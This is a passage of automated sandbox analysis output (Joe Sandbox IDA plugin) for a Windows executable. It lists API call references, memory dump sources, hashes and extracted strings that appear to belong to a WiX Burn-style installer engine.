                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                            • API String ID: 1659193697-3250950999
                                                            • Opcode ID: e290b9c4352081d2f5caaa7d186934708a8726e7a2cc9e84df57afb495b7131b
                                                            • Instruction ID: 95a7262614b137915f4598f9bbf10a8487c76c39dc4019b7a16103618276e840
                                                            • Opcode Fuzzy Hash: e290b9c4352081d2f5caaa7d186934708a8726e7a2cc9e84df57afb495b7131b
                                                            • Instruction Fuzzy Hash: C221F532D58219BBDB2196988C06BEE77B9FF10720F208051F81AF6356DFB4DE00D6A1
                                                            APIs
                                                            • CompareStringW.KERNEL32(00000000,00000000,008BB500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,008967DE,?,00000001,?,008BB4A0), ref: 00895C45
                                                            Strings
                                                            • Failed to insert execute action., xrefs: 00895C9A
                                                            • feclient.dll, xrefs: 00895C3B, 00895D65
                                                            • Failed to plan action for target product., xrefs: 00895CF0
                                                            • Failed grow array of ordered patches., xrefs: 00895CDE
                                                            • Failed to copy target product code., xrefs: 00895D78
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                            • API String ID: 1825529933-3477540455
                                                            • Opcode ID: 449f9ca15f6c10d1491fa542eb316d7f16f74955e301b548f9a6afadce6abf88
                                                            • Instruction ID: 8c6bdc04727c522ab6fd4a1007bffaaadd42e6b17340510c1344bfd7f476b010
                                                            • Opcode Fuzzy Hash: 449f9ca15f6c10d1491fa542eb316d7f16f74955e301b548f9a6afadce6abf88
                                                            • Instruction Fuzzy Hash: 1A8124B560474A9FCF16EF58C880AAA77A5FF08328F198569ED19DB352C730ED11CB90
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,008AD262,00000000,00000000,00000000,00000000,00000000,008A2F1D), ref: 008ACB2F
                                                            • __fassign.LIBCMT ref: 008ACBAA
                                                            • __fassign.LIBCMT ref: 008ACBC5
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 008ACBEB
                                                            • WriteFile.KERNEL32(?,00000000,00000000,008AD262,00000000,?,?,?,?,?,?,?,?,?,008AD262,00000000), ref: 008ACC0A
                                                            • WriteFile.KERNEL32(?,00000000,00000001,008AD262,00000000,?,?,?,?,?,?,?,?,?,008AD262,00000000), ref: 008ACC43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 1478db93a4b87767049c8b8631436e1e6e100ba4639b745cf36ababb44bf29a6
                                                            • Instruction ID: 1993d32164d44a9921e06553b918e76660b6f6e0429d92bfe6dee00093f0345a
                                                            • Opcode Fuzzy Hash: 1478db93a4b87767049c8b8631436e1e6e100ba4639b745cf36ababb44bf29a6
                                                            • Instruction Fuzzy Hash: 3151B171A00209DFEB10CFA8DC85AEEBBF8FF0A310F14411AE955E7251E7709941CBA1
                                                            APIs
                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,00887113,000000B8,0000001C,00000100), ref: 008992A4
                                                            • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,008BB4B8,000000FF,?,?,?,00887113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 0089932E
                                                            Strings
                                                            • comres.dll, xrefs: 008993B0
                                                            • BA aborted detect forward compatible bundle., xrefs: 00899398
                                                            • Failed to initialize update bundle., xrefs: 008993D1
                                                            • detect.cpp, xrefs: 0089938E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
                                                            • API String ID: 1825529933-439563586
                                                            • Opcode ID: f9e1f55dca00e17605b6502c9b5f00a8137ac8cd5b99745cd0f7843247cc5d36
                                                            • Instruction ID: d113a1c5614c66017acbb9ca355a37de2b1d021df9f44afa68433b3998335cdd
                                                            • Opcode Fuzzy Hash: f9e1f55dca00e17605b6502c9b5f00a8137ac8cd5b99745cd0f7843247cc5d36
                                                            • Instruction Fuzzy Hash: C751B371600205FBDF15AF9CCC81EAAB76AFF05310F58426DF928DA295C771D860DB91
                                                            APIs
                                                            • GetLastError.KERNEL32(00875479,000000FF,00AAC56B,E9008BBA,008753BD,00000000,?,E9008BBA,00000000), ref: 0088AC94
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00875479,000000FF,00AAC56B,E9008BBA,008753BD,00000000,?,E9008BBA,00000000), ref: 0088ACD8
                                                            Strings
                                                            • cache.cpp, xrefs: 0088AC6A, 0088ACB8, 0088ACFC
                                                            • Failed authenticode verification of payload: %ls, xrefs: 0088AC75
                                                            • Failed to get provider state from authenticode certificate., xrefs: 0088ACC2
                                                            • Failed to get signer chain from authenticode certificate., xrefs: 0088AD06
                                                            • Failed to verify expected payload against actual certificate chain., xrefs: 0088AD1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                            • API String ID: 1452528299-2590768268
                                                            • Opcode ID: 2e75341259ea68add85cfd125aa0e371da94e961e1ac1fbfde62ad8caab60195
                                                            • Instruction ID: e22e96e5b9eb9350b49498816a7b19744f350e97ec14ffebe74252c0017032bf
                                                            • Opcode Fuzzy Hash: 2e75341259ea68add85cfd125aa0e371da94e961e1ac1fbfde62ad8caab60195
                                                            • Instruction Fuzzy Hash: A9416872D41629A7EB15AB98CC45A9EBB78FF04720F11012AF915F7281E77499048BA2
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 008B033C
                                                            • GetComputerNameW.KERNEL32(?,?), ref: 008B0394
                                                            Strings
                                                            • Computer : %ls, xrefs: 008B0402
                                                            • Executable: %ls v%d.%d.%d.%d, xrefs: 008B03F0
                                                            • === Logging started: %ls ===, xrefs: 008B03BF
                                                            • --- logging level: %hs ---, xrefs: 008B0454
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Name$ComputerFileModule
                                                            • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                            • API String ID: 2577110986-3153207428
                                                            • Opcode ID: 28f8dffd02cc1a9cb913bbff11e07c3be6c37b0d722958054ebbaca98719cc09
                                                            • Instruction ID: 21a13ab55f23a00cb093b46ff24f700b52ea632bd0a8e84155e60a4e19687ba7
                                                            • Opcode Fuzzy Hash: 28f8dffd02cc1a9cb913bbff11e07c3be6c37b0d722958054ebbaca98719cc09
                                                            • Instruction Fuzzy Hash: C14186B290011C9BCB24DF68DD45AEB77BCFB44304F4042A6F649E3342D670AE848FA9
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000001,008BB500,?,00000001,000000FF,?,?,75C0B390,00000000,00000001,00000000,?,008874E6), ref: 0088D560
                                                            Strings
                                                            • elevation.cpp, xrefs: 0088D46B
                                                            • UX aborted elevation requirement., xrefs: 0088D475
                                                            • Failed to elevate., xrefs: 0088D542
                                                            • Failed to create pipe and cache pipe., xrefs: 0088D4BD
                                                            • Failed to create pipe name and client token., xrefs: 0088D4A1
                                                            • Failed to connect to elevated child process., xrefs: 0088D549
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                            • API String ID: 2962429428-3003415917
                                                            • Opcode ID: 5ff8a54c4ba4eafdee75ce932a0c4641b7fe2c1ec1cb6ce1fd8ce0356ddaa967
                                                            • Instruction ID: 202629a7312342f59c41fb12ed2e5b40e238533bb7d1c6fe59eb0abe6c5c9a59
                                                            • Opcode Fuzzy Hash: 5ff8a54c4ba4eafdee75ce932a0c4641b7fe2c1ec1cb6ce1fd8ce0356ddaa967
                                                            • Instruction Fuzzy Hash: 5B310A726447267AE715B6688C42FBA676DFF00734F104216F918EA2C1DA71ED408796
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00000000,0088AD40,?,00000000,00000000), ref: 0088D2E9
                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0088D2F5
                                                              • Part of subcall function 0088CF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?), ref: 0088CF37
                                                              • Part of subcall function 0088CF25: GetLastError.KERNEL32(?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0088CF41
                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,0088C7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 0088D376
                                                            Strings
                                                            • elevation.cpp, xrefs: 0088D319
                                                            • Failed to pump messages in child process., xrefs: 0088D34D
                                                            • Failed to create elevated cache thread., xrefs: 0088D323
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                            • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                            • API String ID: 3606931770-4134175193
                                                            • Opcode ID: 3e8ac829d2b9a2cee05779e30dced3cf377b28cd97198becd7eb93e0fab2690a
                                                            • Instruction ID: 9a834db0722cf3c010b714fe7e2c3325d5d2745179bca522f165c44d7c283c0a
                                                            • Opcode Fuzzy Hash: 3e8ac829d2b9a2cee05779e30dced3cf377b28cd97198becd7eb93e0fab2690a
                                                            • Instruction Fuzzy Hash: 2D41E4B6D41219AFCB05EF99D8859DEBBF8FF08710B10412AF918E7340E77499008FA5
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 008B15DA
                                                            • lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 008B163C
                                                            • lstrlenW.KERNEL32(?), ref: 008B1648
                                                            • RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 008B168B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$Value
                                                            • String ID: BundleUpgradeCode$regutil.cpp
                                                            • API String ID: 198323757-1648651458
                                                            • Opcode ID: fdfb0902bf3020a5ef8400e8b34f5c51b6a8de5851824864d5193bd058cf7b9d
                                                            • Instruction ID: 8b777f8ae56ba46017cd480910d8064c2de64b0012f00a64308f6062ef70ac9e
                                                            • Opcode Fuzzy Hash: fdfb0902bf3020a5ef8400e8b34f5c51b6a8de5851824864d5193bd058cf7b9d
                                                            • Instruction Fuzzy Hash: D6419F7290062AABCF219F988C89AEEBBB8FF54750F450165FD11EB310D730ED119BA0
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(008DB5FC,00000000,?,?,?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?), ref: 008B0533
                                                            • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,008DB5F4,?,00884207,00000000,Setup), ref: 008B05D7
                                                            • GetLastError.KERNEL32(?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?,?,?), ref: 008B05E7
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?), ref: 008B0621
                                                              • Part of subcall function 00872DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00872F09
                                                            • LeaveCriticalSection.KERNEL32(008DB5FC,?,?,008DB5F4,?,00884207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008754FA,?), ref: 008B067A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                            • String ID: logutil.cpp
                                                            • API String ID: 4111229724-3545173039
                                                            • Opcode ID: 3a1a08cb0620bee735915da8ba5823b61b2f6caec8cf57bd24ad7437b132df52
                                                            • Instruction ID: 4ae2c69de50adf55a3c86406756d8acb0de4e4ae94bbbd958a4d742c1e01572c
                                                            • Opcode Fuzzy Hash: 3a1a08cb0620bee735915da8ba5823b61b2f6caec8cf57bd24ad7437b132df52
                                                            • Instruction Fuzzy Hash: CB31C07190132AEBCB219FA89D45EAF7B78FB15754F014326B910E6361DB70CD209FA1
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 008939F4
                                                            Strings
                                                            • Failed to append property string part., xrefs: 00893A68
                                                            • %s%="%s", xrefs: 00893A27
                                                            • Failed to format property string part., xrefs: 00893A6F
                                                            • Failed to format property value., xrefs: 00893A7D
                                                            • Failed to escape string., xrefs: 00893A76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16
                                                            • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                            • API String ID: 3613110473-515423128
                                                            • Opcode ID: bbe48461fc5bfcf0f8ab617aa10b2e039f38c49eee6acc197061d27cb7e8a9a1
                                                            • Instruction ID: c7e8c4ad6eec3ea783b1516d3889f908ada66d6b3244081cac60dd395ed4ed78
                                                            • Opcode Fuzzy Hash: bbe48461fc5bfcf0f8ab617aa10b2e039f38c49eee6acc197061d27cb7e8a9a1
                                                            • Instruction Fuzzy Hash: 02318072D0422AAFCF15AE98DC42EAEBBB8FB00714F14426AF815E6251D771DF10DB91
                                                            APIs
                                                            • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,008B432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0088A063,00000001), ref: 008B4203
                                                            • GetLastError.KERNEL32(00000002,?,008B432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0088A063,00000001,000007D0,00000001,00000001,00000003), ref: 008B4212
                                                            • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,008B432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0088A063,00000001), ref: 008B42A6
                                                            • GetLastError.KERNEL32(?,008B432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,0088A063,00000001,000007D0,00000001), ref: 008B42B0
                                                              • Part of subcall function 008B4440: FindFirstFileW.KERNEL32(0089923A,?,00000100,00000000,00000000), ref: 008B447B
                                                              • Part of subcall function 008B4440: FindClose.KERNEL32(00000000), ref: 008B4487
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorFindLastMove$CloseFirst
                                                            • String ID: \$fileutil.cpp
                                                            • API String ID: 3479031965-1689471480
                                                            • Opcode ID: fbc22d7afd82bec4e6eac1c26935f65823e3943d856265b1ce40635177c16e65
                                                            • Instruction ID: 8b565766bd775209389a99f431706033058b80a172bf858b5e387d0c37574e45
                                                            • Opcode Fuzzy Hash: fbc22d7afd82bec4e6eac1c26935f65823e3943d856265b1ce40635177c16e65
                                                            • Instruction Fuzzy Hash: 69310136A0123AABDF215E99CC02AFF7A69FF51760F11612AFC14DB316D3708C41A2D1
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,00875932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0087733E
                                                            • LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,00875932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0087741D
                                                            Strings
                                                            • Failed to get unformatted string., xrefs: 008773AE
                                                            • Failed to get value as string for variable: %ls, xrefs: 0087740C
                                                            • Failed to format value '%ls' of variable: %ls, xrefs: 008773E7
                                                            • Failed to get variable: %ls, xrefs: 0087737F
                                                            • *****, xrefs: 008773D9, 008773E6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                            • API String ID: 3168844106-2873099529
                                                            • Opcode ID: e7c051b456bb26f911688bc4ca542ccba04ec46c610e0142e0b27bf592d8d653
                                                            • Instruction ID: f291de299449f811521173ab68d4d4e2cfdcaa36c41d4b7bf161d5494268465b
                                                            • Opcode Fuzzy Hash: e7c051b456bb26f911688bc4ca542ccba04ec46c610e0142e0b27bf592d8d653
                                                            • Instruction Fuzzy Hash: F631AB3290461AFBDF226E44CC05BAEBB64FF10365F00C225F818E6250D375EA64EBD9
                                                            APIs
                                                            • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00888E37
                                                            • GetLastError.KERNEL32 ref: 00888E41
                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 00888EA1
                                                            Strings
                                                            • cache.cpp, xrefs: 00888E65
                                                            • Failed to initialize ACL., xrefs: 00888E6F
                                                            • Failed to allocate administrator SID., xrefs: 00888E1D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesErrorFileInitializeLast
                                                            • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                            • API String ID: 669721577-1117388985
                                                            • Opcode ID: 0781c039964ceb6b4e38404bb20d89c68c1ce2b5491f9c59f74c9dbad5e2ab7f
                                                            • Instruction ID: 99fb131cdaf48ca4194eec32bddb133e66864e3ebb0e05c0105b26e467cbe760
                                                            • Opcode Fuzzy Hash: 0781c039964ceb6b4e38404bb20d89c68c1ce2b5491f9c59f74c9dbad5e2ab7f
                                                            • Instruction Fuzzy Hash: 5621A872E40224F7DB21BA999C85F9FB779FF44B10F514129B914FB280DB749D009791
                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,00884028,00000001,feclient.dll,?,00000000,?,?,?,00874B12), ref: 0087424D
                                                            • GetLastError.KERNEL32(?,?,00884028,00000001,feclient.dll,?,00000000,?,?,?,00874B12,?,?,008BB488,?,00000001), ref: 00874259
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,00884028,00000001,feclient.dll,?,00000000,?,?,?,00874B12,?), ref: 00874294
                                                            • GetLastError.KERNEL32(?,?,00884028,00000001,feclient.dll,?,00000000,?,?,?,00874B12,?,?,008BB488,?,00000001), ref: 0087429E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryErrorLast
                                                            • String ID: crypt32.dll$dirutil.cpp
                                                            • API String ID: 152501406-1104880720
                                                            APIs
                                                            Strings
                                                            • Unexpected call to CabWrite()., xrefs: 00890BC1
                                                            • cabextract.cpp, xrefs: 00890C2B
                                                            • Failed to write during cabinet extraction., xrefs: 00890C35
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite_memcpy_s
                                                            • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                            • API String ID: 1970631241-3111339858
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879AFB
